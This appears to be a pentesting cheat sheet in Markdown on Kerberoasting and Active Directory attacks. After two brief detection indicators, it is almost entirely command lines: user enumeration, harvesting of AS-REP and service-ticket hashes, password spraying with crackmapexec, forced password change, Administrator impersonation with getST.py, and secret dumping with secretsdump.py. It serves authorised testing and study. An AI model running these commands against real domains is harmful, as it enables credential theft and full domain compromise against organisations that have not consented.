73 lines
1.5 KiB
Markdown
73 lines
1.5 KiB
Markdown
# Kerberoast
|
|
|
|
An indicator for kerberoast are downgraded RC4 encryption instead of AES.
|
|
That means `Ticket_Encryption_Type=0x17` (RC4) instead of `0x12` (AES-256).
|
|
|
|
The event code for TGS, which is needed for kerberoasting is `4769`.
|
|
|
|
## Usage
|
|
|
|
### List users
|
|
|
|
```sh
|
|
kerbrute userenum -d $DOMAIN --dc $TARGET_IP $USER_LIST
|
|
kerbrute userenmum --dc $TARGET_IP --domain $DOMAIN $USER_LIST --downgrade
|
|
```
|
|
|
|
### Get Users
|
|
|
|
* Impacket's `GetNPUsers.py` to get Hashes of userlist
|
|
|
|
```sh
|
|
GetNPUsers.py -no-pass <DomainName>/ -usersfile users.txt -format john -outputfile hashes
|
|
```
|
|
|
|
### Find SPNs
|
|
|
|
```sh
|
|
GetUserSPNs.py -request <DOMAIN>/<USER>:<PASSWORD> -dc-ip $TARGET_IP
|
|
```
|
|
|
|
or
|
|
|
|
```sh
|
|
pyverview get-netuser -u <USER> -p <PASSWORD> -t <SUBDOMAIN> -d <DOMAIN>
|
|
```
|
|
|
|
### Further Intel
|
|
|
|
```sh
|
|
findDelegation.py -debug <DOMAIN>/<USER>:<PASSWORD> -dc-ip $TARGET_IP
|
|
```
|
|
|
|
### Check Found Users
|
|
|
|
Use crackmapexec to check access to further user accounts with the password of the user found with `GetNPUsers.py`
|
|
|
|
```sh
|
|
crackmapexec smb $TARGET_IP -u users.txt -p pass.txt
|
|
```
|
|
|
|
Watch out for `STATUS_PASSWORD_MUST_CHANGE`
|
|
|
|
Change password with
|
|
|
|
```sh
|
|
smbpasswd.py <user>@$TARGET_IP -newpass password123
|
|
```
|
|
|
|
### Impersonate
|
|
|
|
```sh
|
|
getST.py -spn <USER>/<SUBDOMAIN> -impersonate Administrator '<DOMAIN>/<USER>:<PASSWORD>' -dc-ip $TARGET_IP
|
|
```
|
|
|
|
* Serviceticket is safe as `Administrator.ccache`
|
|
* `export KRB5CCNAME=Administrator.ccache`
|
|
|
|
After that dump secrets:
|
|
|
|
```sh
|
|
secretsdump.py -k -no-pass <DOMAIN>
|
|
```
|